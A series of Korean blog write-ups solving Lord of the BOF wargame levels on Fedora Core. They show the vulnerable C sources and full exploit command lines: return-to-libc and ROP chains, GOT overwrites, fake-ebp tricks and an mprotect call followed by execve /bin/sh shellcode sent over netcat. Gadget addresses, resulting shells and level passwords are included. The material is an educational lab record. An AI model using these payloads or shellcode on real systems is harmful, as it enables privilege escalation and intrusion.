dark_stone -> cruel

워게임/Lord Of the BOF 2013.10.15 14:42

 

[dark_stone@Fedora_2ndFloor ~]$ cat cruel.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - cruel
 - Local BOF on Fedora Core 4
 - hint : no more fake ebp, RET sleding on random library
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
/*
 * Entry point of the "cruel" level. argv[1] is copied verbatim into a
 * fixed-size stack buffer, so the program is a textbook stack-based
 * buffer overflow; the only fix needed is a bounded copy (e.g.
 * snprintf(buffer, sizeof buffer, "%s", argv[1])). The listing on this
 * page stops after the printf call, so the closing brace is not shown.
 */
int main(int argc, char *argv[])
{
    /* 256 bytes of automatic storage; nothing below checks strlen(argv[1]). */
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    /* Unbounded copy: any argument of 256 bytes or more writes past the
     * end of buffer and into whatever the compiler placed above it on the
     * stack (saved registers, return address). */
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

 

스택에 있는 값을 인자로 사용해 execve 함수를 호출했습니다

 

 

[dark_stone@Fedora_2ndFloor ~]$ ./cruel $(perl -e 'print "\xf9\x84\x04\x08"x77, "\xbc\x2a\x83\x00"')
[dark_stone@Fedora_2ndFloor ~]$ /tmp/cruel_pwned -p
cruel_pwned-3.00$ whoami
cruel
cruel_pwned-3.00$ my-pass
euid = 501
come on, come over
cruel_pwned-3.00$  

 




evil_wizard -> dark_stone

워게임/Lord Of the BOF 2013.10.15 14:14

 

 

이번 문제도 저번문제처럼 .bss에 RTL 페이로드를 복사해 풀려 했으나

execve함수에서 자꾸 Bad Address에러가 나서 실패했습니다

원인에 대한 분석을 언제할진 모르겠지만 하게되면 블로그에 올리겠습니다

 

그래서 printf -> system 으로 got overwrite 해 풀었습니다

 

풀면서 노트한 내용입니다

 

0x8048408 printf@PLT
0x804984c printf@GOT
0x8048438 strcpy@PLT
0x80484f3 ppr

0x007507c0 system@LIBC
0x00833603 "/bin/sh"@LIBC

strcpy( 0x8049850, "0x007507c0" )


0x80482b4 0xc0 0x8049850 \x4c\x98\x04\x08\xd0\x84\x04\x08
0x8048364 0x07 0x8049851 \x4d\x98\x04\x08\x64\x83\x04\x08
0x80484d0 0x75 0x8049852 \x4e\x98\x04\x08\xb4\x82\x04\x08
0x804833c 0x00 0x8049853 \x4f\x98\x04\x08\x3c\x83\x04\x08

strcpy + ppr \x38\x84\x04\x08\xf3\x84\x04\x08

\x38\x84\x04\x08\xf3\x84\x04\x08\x4c\x98\x04\x08\xd0\x84\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4d\x98\x04\x08\x64\x83\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4e\x98\x04\x08\xb4\x82\x04\x08
\x38\x84\x04\x08\xf3\x84\x04\x08\x4f\x98\x04\x08\x3c\x83\x04\x08

 




hell_fire -> evil_wizards

워게임/Lord Of the BOF 2013.10.12 11:38

 

[hell_fire@Fedora_1stFloor ~]$ cat evil_wizard.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - evil_wizard
 - Local BOF on Fedora Core 3
 - hint : GOT overwriting
*/

// magic potion for you
/*
 * Deliberately planted "pop; pop; ret" gadget (32-bit x86, GCC inline
 * asm, AT&T syntax). It is never called by the program; its only effect
 * is to place that instruction sequence at a fixed address in the binary
 * (the author's notes on this page label it "ppr"). Calling it normally
 * would pop the return address and one more word, then jump to whatever
 * follows on the stack. From a hardening standpoint, helpers like this
 * should never be compiled into a privileged binary: they hand an
 * attacker a ready-made return-oriented gadget.
 */
void pop_pop_ret(void)
{
 asm("pop %eax");
 asm("pop %eax");
 asm("ret");
}
 
/*
 * Entry point of the "evil_wizard" level. Copies argv[1] into a 256-byte
 * stack buffer with strcpy (the overflow), but first saves and afterwards
 * restores the 4 bytes at buffer+264 so that the overflow cannot
 * permanently change them, and finally zeroes memory above the copied
 * string. No #include lines appear in this listing, so printf, exit,
 * strlen, setreuid/setregid, memcpy, strcpy and memset are either
 * implicitly declared or the includes were trimmed from the page.
 * The root cause is the unbounded strcpy; a bounded copy
 * (snprintf(buffer, sizeof buffer, "%s", argv[1])) removes the bug.
 */
int main(int argc, char *argv[])
{
 char buffer[256];
 // Holds a copy of the 4 bytes at buffer+264 (past the end of buffer).
 char saved_sfp[4];
 int length;

 if(argc < 2){
  printf("argv error\n");
  exit(0);
 }

 // for disturbance RET sleding
 // Length of the attacker-controlled string; used below as the start of
 // the region that gets zeroed.
 length = strlen(argv[1]);
  
        // healing potion for you
        // Make the real uid/gid equal the effective ones (presumably the
        // binary runs setuid/setgid, judging by the euid shown in the
        // transcript on this page; not visible from the source itself).
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

 // save sfp
 // Reads 8 bytes beyond the 256-byte array, which is already undefined
 // behaviour; the author's comment says these 4 bytes are the saved
 // frame pointer, which depends on the compiler's stack layout.
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 // Unbounded copy of argv[1] into buffer: the stack-based overflow.
 strcpy(buffer, argv[1]);

 // restore sfp
 // Undoes whatever the overflow wrote at buffer+264, so the saved frame
 // pointer cannot be replaced (the "no more fake ebp" idea; the level's
 // hint points at GOT overwriting instead).
 memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        // Zeroes everything from the end of the copied string up to the
        // absolute address 0xff000000, i.e. the rest of the stack above
        // the string (environment, argv copies). Pointer/int casts and
        // out-of-bounds arithmetic here are undefined behaviour; the
        // comment says the intent is to hinder RET sleds.
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

 printf("%s\n", buffer);
}
[hell_fire@Fedora_1stFloor ~]$ 

 

아래는 원래 텍스트가 길어서 잘려서 보기 좋게 개행했습니다

[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard $(perl -e 'print "A"x268,
"\xe8\x86\x04\x08", "A"x88, "\xac\x98\x04\x08", "\xe9\x86\
x04\x08"x100, "\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\
x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x0
8\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\
x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x0
4\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\
x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81
\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x
08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba
\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x
04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08", "\xe8\x86\x04\x08"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAH³.AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAA¬....................................................................................鄄...............O°,O±TO²ȂO³ׄO¸HO¹Oº#O»ׄ脄
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$

 

 

힌트는 got overwrite라고 돼 있는데 어떻게 해야 할지 모르겠어서

.bss에 system함수 주소와 /bin/sh 문자열 주소를 복사한 후 fake ebp해 풀었습니다

 

 

아래는 문제를 풀면서 작성한 노트입니다

 

/bin/sh  0x833603
system  0x7507c0
.bss  0x080498b0
strcpy@plt 0x08048494
ppr  0x0804854f
leaveret 0x080486e8
fakeebp  .bss-4 ( 0x080498ac )


0x0804852c 0xc0 0x080498b0 \xb0\x98\x04\x08\x2c\x85\x04\x08
0x08048154 0x07 0x080498b1 \xb1\x98\x04\x08\x54\x81\x04\x08
0x080482c8 0x75 0x080498b2 \xb2\x98\x04\x08\xc8\x82\x04\x08
0x080484d7 0x00 0x080498b3 \xb3\x98\x04\x08\xd7\x84\x04\x08

0x08048148 0x03 0x080498b8 \xb8\x98\x04\x08\x48\x81\x04\x08
0x080481e0 0x36 0x080498b9 \xb9\x98\x04\x08\xe0\x81\x04\x08
0x08048523 0x83 0x080498ba \xba\x98\x04\x08\x23\x85\x04\x08
0x080484d7 0x00 0x080498bb \xbb\x98\x04\x08\xd7\x84\x04\x08

strcpy + plt \x94\x84\x04\x08\x4f\x85\x04\x08

\xb0\x98\x04\x08\x2c\x85\x04\x08
\xb1\x98\x04\x08\x54\x81\x04\x08
\xb2\x98\x04\x08\xc8\x82\x04\x08
\xb3\x98\x04\x08\xd7\x84\x04\x08
\xb8\x98\x04\x08\x48\x81\x04\x08
\xb9\x98\x04\x08\xe0\x81\x04\x08
\xba\x98\x04\x08\x23\x85\x04\x08
\xbb\x98\x04\x08\xd7\x84\x04\x08

\x94\x84\x04\x08\x4f\x85\x04\x08\xb0\x98\x04\x08\x2c\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb1\x98\x04\x08\x54\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb2\x98\x04\x08\xc8\x82\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb3\x98\x04\x08\xd7\x84\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb8\x98\x04\x08\x48\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xb9\x98\x04\x08\xe0\x81\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xba\x98\x04\x08\x23\x85\x04\x08\x94\x84\x04\x08\x4f\x85\x04\x08\xbb\x98\x04\x08\xd7\x84\x04\x08

 

 




dark_eyes -> hell_fire

워게임/Lord Of the BOF 2013.10.10 21:48

 

[dark_eyes@Fedora_1stFloor ~]$ cat hell_fire.c
/*
 The Lord of the BOF : The Fellowship of the BOF
 - hell_fire
 - Remote BOF on Fedora Core 3
 - hint : another fake ebp or got overwriting
 - port : TCP 7777
*/

#include <stdio.h>

/*
 * Entry point of the "hell_fire" level. Reads up to 1023 bytes from stdin
 * into temp (bounded by fgets), then copies that line into a 256-byte
 * stack buffer with strcpy (unbounded) - the overflow. As in the sibling
 * levels, the 4 bytes at buffer+264 are saved before and restored after
 * the copy. The file header says this runs as a remote service on
 * TCP 7777, presumably with stdin/stdout attached to the socket by a
 * wrapper; that is not visible in the source. Only <stdio.h> is included,
 * so memcpy/strcpy rely on implicit declarations. The listing on this
 * page stops after the final printf, so the closing brace is not shown.
 * Fix: copy with a bound, e.g. snprintf(buffer, sizeof buffer, "%s", temp).
 */
int main()
{
 char buffer[256];
 // Copy of the 4 bytes at buffer+264 (beyond the array).
 char saved_sfp[4];
 // Staging buffer for the input line; fgets limits it to 1023 bytes + NUL.
 char temp[1024];
 
 printf("hell_fire : What's this smell?\n");
 printf("you : ");
 // Push the prompt out before blocking on input (matters when stdout is
 // a pipe or socket rather than a terminal).
 fflush(stdout);

 // give me a food
 // Bounded read: at most sizeof temp - 1 bytes, so temp itself is safe.
 fgets(temp, 1024, stdin);
  
 // save sfp
 // Out-of-bounds read of buffer; the author's comment calls these bytes
 // the saved frame pointer (depends on the compiler's stack layout).
 memcpy(saved_sfp, buffer+264, 4);
 
 // overflow!!
 // temp can hold up to 1023 bytes but buffer only 256: unbounded strcpy
 // overruns buffer with attacker-controlled data from the network.
 strcpy(buffer, temp);

 // restore sfp
 // Reverts any change the overflow made at buffer+264.
 memcpy(buffer+264, saved_sfp, 4);

 printf("%s\n", buffer);

소스입니다

fgets를 사용하기 때문에 stdin으로 fake ebp해 mprotect로 rwx 권한을 줘 쉘코드를 실행했습니다

 

[dark_eyes@Fedora_1stFloor ~]$ (perl -e 'print "A"x268, "\x38\x86\x04\x08", "B"x88, "\xf0\xe1\xff\xf6", "\x38\x86\x04\x08", "A"x132, "\x70\x46\x71\x00", "\x58\xe2\xff\xf6", "\x00\xe0\xff\xf6", "\x00\x08\x00\x00", "\x07\x00\x00\x00", "\x90"x300, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"';cat)|nc localhost 7777
hell_fire : What's this smell?
you :

my-pass
euid = 503
sign me up

 

아래는 풀면서 노트한 내용입니다

 

stdin+500으로 fake ebp

stdin = 0xf6ffe000

stdin+500 mprotect (0x714670)
stdin+504 0xf6ffe258
stdin+508 &stdin  (0xf6ffe000)
stdin+512 len  (0x00000800)
stdin+516 prot  (0x00000007)

stdin+600(0xf6ffe258) nop+shellcode

leaveret 0x8048638

mprotect(&stdin, 2048, 7);
 

 




